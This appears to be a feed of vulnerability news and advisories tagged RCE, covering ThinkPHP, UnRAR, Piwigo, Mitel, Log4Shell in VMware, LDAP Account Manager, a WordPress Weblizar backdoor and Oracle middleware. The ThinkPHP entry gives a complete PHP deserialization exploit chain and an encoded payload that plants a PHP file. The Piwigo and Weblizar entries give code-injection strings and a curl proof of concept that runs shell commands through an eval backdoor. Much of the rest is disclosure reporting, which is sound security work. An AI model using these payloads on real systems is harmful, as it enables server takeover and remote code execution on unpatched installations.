ThinkPHP v6.0.12 was discovered to contain a deserialization vulnerability via the component vendor\league\flysystem-cached-adapter\src\Storage\AbstractCache.php. This vulnerability allows attackers to execute arbitrary code via a crafted payload.

**ThinkPHP RCE链子**

**Environment installation**  
test version:Thinkphp6.0.12  
Environment configuration：(tp6只支持用composer安装)  
composer create-project topthink/think=6.0.12 tp612  
Add deserialization entry point

<?php

namespace app\\controller;

  

use app\\BaseController;

use think\\facade\\Request;

class Index extends BaseController

{

    public function index()

    {

        $payload\=Request::post('cmd');

        unserialize($payload);

    }

  

    public function hello($name = 'ThinkPHP6')

    {

        return 'hello,' . $name;

    }

}

    direct interview
    http://127.0.0.1 
    post to send package
    

cmd=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A27%3A%22%3C%3Fphp+phpinfo%28%29%3B+exit%28%29%3B+%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bi%3A2333%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22getDomainBind%22%3B%7Ds%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A21%3A%22League%5CFlysystem%5CFile%22%3A2%3A%7Bs%3A7%3A%22%00%2A%00path%22%3Bs%3A10%3A%22huahua.php%22%3Bs%3A13%3A%22%00%2A%00filesystem%22%3BO%3A25%3A%22think%5Csession%5Cdriver%5CFile%22%3A0%3A%7B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22huahua%22%3B%7D%7D

accesssess_huahua.php  
successfully RCE

exp

<?php  
namespace think\\model\\concern{  
    trait Attribute{  
        private $data = \['huahua'\]; 
    }  
}  
  
namespace think\\view\\driver{  
    class Php{}  
}
namespace think\\session\\driver{
    class File{

    }
}
namespace League\\Flysystem{
    class File{
        protected $path;
        protected $filesystem;
        public function \_\_construct($File){
            $this\->path\='huahua.php';
            $this\->filesystem\=$File;
        }
    }
}
namespace think\\console{
    use League\\Flysystem\\File;
    class Output{
        protected $styles\=\[\];
        private $handle;
        public function \_\_construct($File){
            $this\->styles\[\]='getDomainBind';
            $this\->handle\=new File($File);
        }
    }
}  
namespace think{  
    abstract class Model{  
        use model\\concern\\Attribute;  
        private $lazySave;  
        protected $withEvent;  
        protected $table;  
        function \_\_construct($cmd,$File){  
            $this\->lazySave = true;  
            $this\->withEvent = false;  
            $this\->table = new route\\Url(new Middleware,new console\\Output($File),$cmd);  
        }  
    }  
    class Middleware{  
        public $request = 2333;  
    }   
}  
  
namespace think\\model{  
    use think\\Model;  
    class Pivot extends Model{}   
}  
  
namespace think\\route{  
    class Url  
    {  
        protected $url = 'a:';  
        protected $domain;  
        protected $app;  
        protected $route;  
        function \_\_construct($app,$route,$cmd){  
            $this\->domain = $cmd;  
            $this\->app = $app;  
            $this\->route = $route;  
        }  
    }  
}  
  
namespace{  
    echo urlencode(serialize(new think\\Model\\Pivot('<?php phpinfo(); exit(); ?>',new think\\session\\driver\\File)));  
}

CVE-2022-33107: ThinkPHP 6.0.12 Unserialize RCE · Issue #2717 · top-think/framework

A new security vulnerability has been disclosed in RARlab's UnRAR utility that, if successfully exploited, could permit a remote attacker to execute arbitrary code on a system that relies on the binary.
The flaw, assigned the identifier CVE-2022-30333, relates to a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive.

A new security vulnerability has been disclosed in RARlab's UnRAR utility that, if successfully exploited, could permit a remote attacker to execute arbitrary code on a system that relies on the binary.

The flaw, assigned the identifier CVE-2022-30333, relates to a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive.

Following responsible disclosure on May 4, 2022, the shortcoming was addressed by RarLab as part of version 6.12 released on May 6. Other versions of the software, including those for Windows and Android operating systems, are not impacted.

"An attacker is able to create files outside of the target extraction directory when an application or victim user extracts an untrusted archive," SonarSource researcher Simon Scannell said in a Tuesday report. "If they can write to a known location, they are likely to be able to leverage it in a way leading to the execution of arbitrary commands on the system."

It's worth pointing out that any software that utilizes an unpatched version of UnRAR to extract untrusted archives is affected by the flaw.

This also includes Zimbra collaboration suite, wherein the vulnerability could lead to pre-authenticated remote code execution on a vulnerable instance, giving the attacker complete access to an email server and even abuse it to access or overwrite other internal resources within the organization's network.

The vulnerability, at its heart, relates to a symbolic link attack in which a RAR archive is crafted such that it contains a symlink that's a mix of both forward slashes and backslashes (e.g., "..\\..\\..\\tmp/shell") so as to bypass current checks and extract it outside of the expected directory.

More specifically, the weakness has to do with a function that's designed to convert backslashes ('\\') to forward slashes ('/') so that a RAR archive created on Windows can be extracted on a Unix system, effectively altering the aforementioned symlink to "../../../tmp/shell."

By taking advantage of this behavior, an attacker can write arbitrary files anywhere on the target filesystem, including creating a JSP shell in Zimbra's web directory and execute malicious commands.

"The only requirement for this attack is that UnRAR is installed on the server, which is expected as it is required for RAR archive virus-scanning and spam-checking," Scannell noted.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New UnRAR Vulnerability Could Let Attackers Hack Zimbra Webmail Servers

piwigo 11.5.0 is affected by a remote code execution (RCE) vulnerability in the LocalFiles Editor.

**Piwigo has a background command execution vulnerability**

Command injection vulnerability trigger point

Use admin to enter the background

Click settings to come to this page

Write in it

<?phpvar\_dump(1);}if(1){system('calc');?>

Next breakpoint single step debugging

You will find that this sentence is implemented here

**code analysis**

Text is passed in $content without filtering_ File and then pass in the function

The incoming code is spliced here. Caused code execution

CVE-2021-40553: vuln/README.md at main · Yang9999999/vuln

Researchers have created a new community website for reporting and tracking security issues in cloud platforms and services — plus fixes for them where available.

Organizations traditionally have struggled to track vulnerabilities in public cloud platforms and services because of the lack of a common vulnerability enumeration (CVE) program like the one that MITRE maintains for publicly disclosed software security issues.

A new community-based database launched this week seeks to begin addressing that issue by providing a central repository of information on known cloud service-provider security issues and the steps organizations can take to mitigate them.

The database — cloudvulndb.org — is the brainchild of security researchers at Wiz, who for some time have been advocating the need for a public catalog of known security flaws on platforms and services run by the likes of AWS, Microsoft, and Google. The database currently lists some 70 cloud security issues and vulnerabilities that security researcher Scott Piper had previously compiled in a document on GitHub titled "Cloud Service Provider security mistakes." Going forward, anyone is free to suggest new issues to add to the website or to suggest new fixes to existing issues. The goal is to list issues that a cloud service provider might have already addressed.

**Centralized Vulnerability Repository**

"The centralized database can help organizations review all past security issues in their \[cloud service provider\] at any time and check if they have not applied necessary remediation actions," says Alon Schindel, director of data and threat research at Wiz. "For example, organizations can check if they were using a certain service during a critical security issue’s exploitability period and use the recommended detection methods — if available — to check if they were affected."

For now, the vulnerability database site does not have a system in place to automatically notify users when new security issues are added to it. But the goal is to add an RSS feed or mailing list for that purpose, says Schindel, one of the maintainers of the new database.

Schindel — like many other researchers — has noted how the lack of a formal and standardized system for publicly recording cloud security issues, and sharing information about them, is heightening risks for organizations. In a blog last November, Schindel and another Wiz researcher pointed to vulnerabilities — such as one dubbed ChaosDB in Microsoft Azure and another called OMIGOD in Microsoft Azure — as specific reasons why a cloud vulnerability database has become a critical industry necessity. Both vulnerabilities were serious. And unlike many cloud vulnerabilities, the responsibility for mitigating risk with both vulnerabilities rested not just with the cloud provider but also with their customers.

ChaosDB impacted four Azure services and gave users overly permissive access to storage buckets belonging to other cloud tenants. OMIGOD was a set of four flaws in OMI, a Microsoft cloud middleware technology, that enabled remote code execution and privilege escalation. Though Azure and Microsoft addressed the vulnerabilities promptly, many organizations using the affected services had limited information on the changes they needed to make to address them, the Wiz researchers said.

"Typically, cloud service provider security issues do not have a patch in the traditional sense, as issues are fixed internally by the CSP without the need for any manual user action," Schindel says. But no CVEs mean that there are no industry conventions for assessing severity, no proper notification channels, and no unified tracking mechanisms. 

"This means that it’s difficult for a cloud customer to answer otherwise simple questions like, 'Is my environment currently vulnerable to this?' or, 'Was it ever vulnerable to this?'" he adds.

**Inconsistent Practices**

Currently all major CSPs accept responsibly disclosed vulnerabilities, and some have an official bug bounty or vulnerability reward program in place. Occasionally, a cloud service provider might even publish details of a fix they might have developed for a reported security vulnerability. However, there is little consistency among the various providers, Schindel says. 

"Notification channels vary; vendors usually email affected customers only or send them a notification through a service health system," he says.

Wiz has been unable to find any consistency in the publication cadence of security issues of the different CSPs, though Microsoft usually included fixes for Azure vulnerability in its monthly patch release cycle.

Wiz will maintain the new site, though anyone is free to contribute to it. The goal is to try and get major CSPs to engage with the effort or to use the site to provide more transparency around vulnerabilities discovered in their services. This can include information such as indicating the time periods during which a security issue might have been exploitable. 

"We also hope that the value of such a database will help CSPs standardize their security issues publication processes," he says.

New Vulnerability Database Catalogs Cloud Security Issues

Researchers warn threat actors are using a novel remote code execution exploit to gain initial access to victim’s environments.

Researchers warn threat actors are using a novel remote code execution exploit to gain initial access to victim’s environments.

Ransomware groups are abusing unpatched versions of a Linux-based Mitel VoIP (Voice over Internet Protocol) application and using it as a springboard plant malware on targeted systems. The critical remote code execution (RCE) flaw, tracked as CVE-2022-29499, was first report by Crowdstrike in April as a zero-day vulnerability and is now patched.

Mitel is popularly known for providing business phone systems and unified communication as a service (UCaaS) to all forms of organizations. The Mitel focuses on VoIP technology allowing users to make phone calls using an internet connection instead of regular telephone lines.

According to Crowdstrike, the vulnerability affects the Mitel MiVoice appliances SA 100, SA 400 and Virtual SA. The MiVoice provides a simple interface to bring all communications and tools together.

****Bug Exploited to Plant Ransomware**  **

Researcher at Crowdstrike recently investigated a suspected ransomware attack. The team of researchers handled the intrusion quickly, but believe the involvement of the vulnerability (CVE-2022-29499) in the ransomware strike.

The Crowdstrike identifies the origin of malicious activity linked to an IP address associated with a Linux-based Mitel VoIP appliance. Further analysis led to the discovery of a novel remote code exploit.

“The device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment,” Patrick Bennet wrote in a blog post.

The exploit involves two GET requests. The first one targets a “get\_url” parameter of a PHP file and the second one originates from the device itself.

“This first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses,” the researcher explained.

The second request executes the command injection by performing an HTTP GET request to the attacker-controlled infrastructure and runs the stored command on the attacker’s server.

According to the researchers, the adversary uses the flaw to create an SSL-enabled reverse shell via the “mkfifo” command and “openssl\_client” to send outbound requests from the compromised network. The “mkfifo” command is used to create a special file specified by the file parameter and can be opened by multiple processes for reading or writing purposes.

Once the reverse shell was established, the attacker created a web shell named “pdf\_import.php”. The original content of the web shell was not recovered but the researchers identifies a log file that includes a POST request to the same IP address that the exploit originated from. The adversary also downloaded a tunneling tool called “Chisel” onto VoIP appliances to pivot further into the network without getting detected.

The Crowdstrike also identifies anti-forensic techniques performed by the threat actors to conceal the activity.

“Although the threat actor deleted all files from the VoIP device’s filesystem, CrowdStrike was able to recover forensic data from the device. This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor,” said Bennett.

Mitel released a security advisory on April 19, 2022, for MiVoice Connect versions 19.2 SP3 and earlier. While no official patch has been released yet.

****Vulnerable Mitel Devices on Shodan****

The security researcher Kevin Beaumont shared a string “http.html\_hash:-1971546278” to search for vulnerable Mitel devices on the Shodan search engine in a Twitter thread.

According to Kevin, there are approximately 21,000 publicly accessible Mitel appliances worldwide, the majority of which are located in the United States, succeeded by the United Kingdom.

****Mitel Mitigation Recommendations** **

Crowdstrike recommends that organizations tighten defense mechanisms by performing threat modeling and identifying malicious activity. The researcher also advised segregating the critical assets and perimeter devices to restrict the access control in case perimeter devices are compromised.

“Timely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant,” Bennett explained.

Mitel VoIP Bug Exploited in Ransomware Attacks

CISA warns that threat actors are ramping up attacks against unpatched Log4Shell vulnerability in VMware servers.

CISA warns that threat actors are ramping up attacks against unpatched Log4Shell vulnerability in VMware servers.

The Cybersecurity and Infrastructure Security Agency (CISA) and Coast Guard Cyber Command (CGCYBER) released a joint advisory warning the Log4Shell flaw is being abused by threat actors that are compromising public-facing VMware Horizon and Unified Access Gateway (UAG) servers.

The VMware Horizon is a platform used by administrators to run and deliver virtual desktops and apps in the hybrid cloud, while UAG provides secure access to the resources residing inside a network.

According to the CISA, in one instance the advance persistent threat (APT) actor compromises the victim’s internal network, procures a disaster recovery network, and extracts sensitive information. “As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2),” CISA added.

Log4Shell is a remote code execution (RCE) vulnerability affecting the logging library known as “Log4j” in Apache. The library is widely used by various organizations, enterprises, applications, and services.

****Attack Analysis****

The CGCYBER conducts a proactive threat hunting engagement at an organization that was compromised by the threat actors who exploited Log4Shell in VMware Horizon. This revealed that after gaining initial access to the victim system, the adversary uploaded a malware identified as “hmsvc.exe”.

The researchers analyzed the sample of the hmsvc.exe malware and confirmed that the process masquerading as a legitimate Windows service and an altered version of SysInternals LogonSessions software.

According to the researcher sample of hmsvc.exe malware was running with the highest privilege level on a Windows system and contains an embedded executable that allows threat actors to log keystrokes, upload and execute payloads.

“The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network,” The initial execution of malware created a scheduled task that is set to execute every hour.

According to CISA in another onsite incident response engagement, they observed bi-directional traffic between the victim and the suspected APT IP address.

The attackers initially gain access to the victim’s production environment (a set of computers where the user-ready software or update are deployed), by exploiting Log4Shell in unpatched VMware Horizon servers. Later CISA observed that the adversary uses Powershell scripts to perform lateral movements, retrieve and execute the loader malware with the capability to remotely monitor a system, gain reverse shell and exfiltrate sensitive information.

Further analysis revealed that attackers with access to the organization test and production environment leveraged CVE-2022-22954, an RCE flaw in VMware workspace ONE access and Identity manager. to implant the Dingo J-spy web shell,

****Incident Response and Mitigations****

CISA and CGCYBER recommended multiple actions that should be taken if an administrator discovers compromised systems:

1.  Isolate compromised system
2.  Analyze the relevant log, data and artifacts.
3.  All software should be updated and patched from the  .
4.  Reduce the non-essential public-facing hosting service to restrict the attack surface and implement  DMZ, strict network access control, and WAF to protect against attack.
5.  Organizations are advised to implement best practices for identity and access management (IAM) by introducing multifactor authentication (MFA), enforcing strong passwords, and limited user access.

Log4Shell Vulnerability Targeted in VMware Servers to Exfiltrate Data

LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. In versions prior to 8.0 incorrect regular expressions allow to upload PHP scripts to config/templates/pdf. This vulnerability could lead to a Remote Code Execution if the /config/templates/pdf/ directory is accessible for remote users. This is not a default configuration of LAM. This issue has been fixed in version 8.0. There are no known workarounds for this issue.

**Impact**

Incorrect regular expressions allow to upload PHP scripts to config/templates/pdf. This vulnerability could lead to a Remote Code Execution if the  
/config/templates/pdf/ directory is accessible for remote users. This is not a default configuration of LAM.

**Patches**

The issue is fixed in version 8.0.

**Workarounds**

None

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in https://github.com/LDAPAccountManager/lam/issues
*   Email us on lam-public mailinglist

**Credits**

Arseniy Sharoglazov and Andrey Medov

CVE-2022-31086

WordPress Weblizar plugin version 8.9 suffers from a remote code execution vulnerability.

    # Exploit Title: WordPress Plugin Weblizar 8.9 - Backdoor# Google Dork: 'wp-json/am-member/license'# Exploit Author: Sobhan Mahmoodi# Vendor Homepage: https://weblizar.com/plugins/school-management/# Version: 8.9# Tested on: windows/linuxVulnerable code:add_action( 'rest_api_init', function() {     register_rest_route(           'am-member', 'license',           array(                'methods' => WP_REST_Server::CREATABLE,                'callback' => function( $request ) {                                $args = $request->get_params();                                if ( isset( $args['blowfish'] ) && ! empty($args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] )) {                                               eval( $args['blowf'] );                                }                      };                )      );} );If you look at the code, the user code checks the parameters and finally executes the Blowf argument with the eval function. The Eval function is to take a string of PHP commands and execute it.In order to be able to exploit this vulnerability, it is enough to send a request such as the following request that according to the above code, the part with If should be set blowfish and blowf arguments and not empty, andgiven that eval executes the blowf value , Our favorite command must also be in this argument.Proof of Concept:curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'uid=33(www-data) gid=33(www-data) groups=33(www-data)

WordPress Weblizar 8.9 Code Execution

Researchers describe discovery of ‘mega’ zero-day

Researchers describe discovery of ‘mega’ zero-day

Oracle has patched a remote code execution (RCE) vulnerability impacting Oracle Fusion Middleware and various other Oracle systems.

Security researchers ‘Peterjson’ and ‘Jang’ reported a pair of severe flaws to Oracle that can be chained to achieve RCE, which they dubbed the ‘Miracle Exploit’.

The researchers said they privately told Oracle about a serious vulnerability they discovered in Oracle Access Manager, tracked as CVE-2021–35587. The CVSS 9.8 bug is described as an “easily exploitable” flaw that allows unauthenticated attackers with network access via HTTP for application takeover.

**Accidental discovery**

Jang said the flaw was discovered by accident when the duo were “building a PoC \[proof of concept exploit code\] for another mega 0-day”.

While working with the Zero Day Initiative (ZDI), this research led to the discovery of CVE-2022–21445. This ‘mega’ bug, issued a severity score of 9.8, was found in the Oracle Application Development Framework (ADF) Faces architecture, a component of Oracle Fusion Middleware.

Catch up on the latest vulnerability-related security news and analysis

The deserialization of trusted data issue can be chained with CVE-2022–21497 (CVSS 8.1), a takeover flaw in Oracle Web Services Manager, to achieve pre-authentication RCE.

CVE-2022–21445 impacts a variety of products and services based on Fusion Middleware, various Oracle systems, and even Oracle’s cloud infrastructure. Unauthenticated attackers with network access, via HTTP, can abuse the vulnerability chain.

“One more thing to note, any website was developed by ADF Faces framework are affected,” Peterjson said.

**Disclosure and patches**

After testing Oracle services and domains, the vulnerability report was submitted to the vendor on October 25, 2021. In the same month, Oracle confirmed receipt of the report and said it was investigating. However, it took the best part of six months for a patch to be issued.

Both issues have been resolved in Oracle’s April round of patches. Oracle is one of many technology vendors, alongside Microsoft and Adobe, that releases a monthly patch update to tackle bugs in its software.

Companies utilizing vulnerable Oracle software are urged to apply the patch immediately.

Other vendors potentially impacted by the pre-auth RCE were notified via their respective bug bounty programs. Peterjson told The Stack that companies have been informed if they have not applied Oracle’s fix, and that he believes the number of exposed instances is “huge”.

“Why \[did\] we hack some Oracle’s sites? Because we want to demonstrate the impact to Oracle and let them know this vulnerability is super dangerous, it affects Oracle system\[s\] and Oracle’s customers,” Peterjson commented.

“That’s why we want Oracle take an action ASAP. But as you can see, 6 months for Oracle to patch it, I don’t know why, but we have to accept it and follow Oracle’s policy.”

The Daily Swig has reached out to Oracle and we will update this story if and when we hear back.

YOU MIGHT ALSO LIKE Splunk patches critical vulnerability while users push for legacy updates

Oracle patches ‘miracle exploit’ impacting Middleware Fusion, cloud services

CISA warns of log4shell being actively exploited to compromise VMware Horizon systems. We take a look at their warning.
The post CISA Log4Shell warning: Patch VMware Horizon installations immediately appeared first on Malwarebytes Labs.

CISA and the United States Coast Guard Cyber Command (CGCYBER) are warning that the threat of Log4Shell hasn’t gone away. It’s being actively exploited and used to target organisations using VMware Horizon and Unified Access Gateway servers.

**Log4Shell: what is it?**

Log4Shell was a zero-day vulnerability in something called Log4j. This open source logging library written in Java is used by millions of applications, many of them incredibly popular. The easy to trigger attack could be used to perform remote code execution (RCE) on vulnerable systems. If successful, attackers could gain full control over a target system. If they managed to have affected apps log a special string, then it was a case of game over. The system(s) at this point would be ripe for exploitation.

Discovered in November 2021, the exploit was estimated to potentially affect hundreds of millions of devices. With so much potential for damage, fixes were quickly developed and released on December 6, three days before the vulnerability was published.

Related bugs and additional vulnerabilities were also discovered and subsequently patched.

**Broadening Log4Shell’s horizons**

According to CISA and CGCYBER, Log4Shell has been used to exploit unpatched, public-facing VMWare Horizon and UAG servers. Suspected APT threat actors…

> _…implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data._

Attackers not only make use of malware and HTTP, but also PowerShell scripts and Remote Desktop Protocol (RDP). In the latter’s case, this was to further move around the network and other hosts inside the organisation’s production environment.

Compromised administrator accounts were used to run several additional forms of loader malware. Here are some of the samples found by CISA during one investigation:

*   SvcEdge.exe is a malicious Windows loader containing encrypted executable f7\_dump\_64.exe. When executed, SvcEdge.exe decrypts and loads f7\_dump\_64.exe into memory.
*   odbccads.exe is a malicious Windows loader containing an encrypted executable. When executed, odbccads.exe decrypts and loads the executable into memory.
*   praiser.exe is a Windows loader containing an encrypted executable. When executed, praiser.exe decrypts and loads the executable into memory.
*   fontdrvhosts.exe is a Windows loader that contains an encrypted executable. When executed, fontdrvhosts.exe decrypts and loads the executable into memory.
*   winds.exe is a Windows loader containing an encrypted malicious executable and was found on a server running as a service. During runtime, the encrypted executable is decrypted and loaded into memory. winds.exe has complex obfuscation, hindering the analysis of its code structures.

**Advice for securing installations**

CISA/CGCYBER are quite clear about this. Organisations which haven’t applied patches released back in December _should treat any and all affected VMware systems as compromised_:

*   Install fixed builds, updating all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not promptly applied following VMware’s release of updates for Log4Shell in December 2021, treat all affected VMware systems as compromised.
*   Minimize the internet-facing attack surface by hosting essential services on a segregated demilitarized (DMZ) zone, ensuring strict network perimeter access controls, and implementing regularly updated web application firewalls (WAFs) in front of public-facing services.
*   See VMware Security Advisory VMSA-2021-0028.13 and VMware Knowledge Base (KB) 87073 to determine which VMware Horizon components are vulnerable.
*   **Note:** Until the update is fully implemented, consider removing vulnerable components from the internet to limit the scope of traffic. While installing the updates, ensure network perimeter access controls are as restrictive as possible.
*   If upgrading is not immediately feasible, see KB87073 and KB87092 for vendor-provided temporary workarounds. Implement temporary solutions using an account with administrative privileges. Note that these temporary solutions should not be treated as permanent fixes; vulnerable components should be upgraded to the latest build as soon as possible. 
*   Prior to implementing any temporary solution, ensure appropriate backups have been completed. 
*   Verify successful implementation of mitigations by executing the vendor supplied script Horizon_Windows_Log4j_Mitigations.zip without parameters to ensure that no vulnerabilities remain. See KB87073 for details. 

Log4Shell, rated a 10 in the Common Vulnerability Scoring System (CVSS), is not to be trifled with. We advise affected organisations to pay heed to the warnings above and set about patching as soon as possible.

Tag

#rce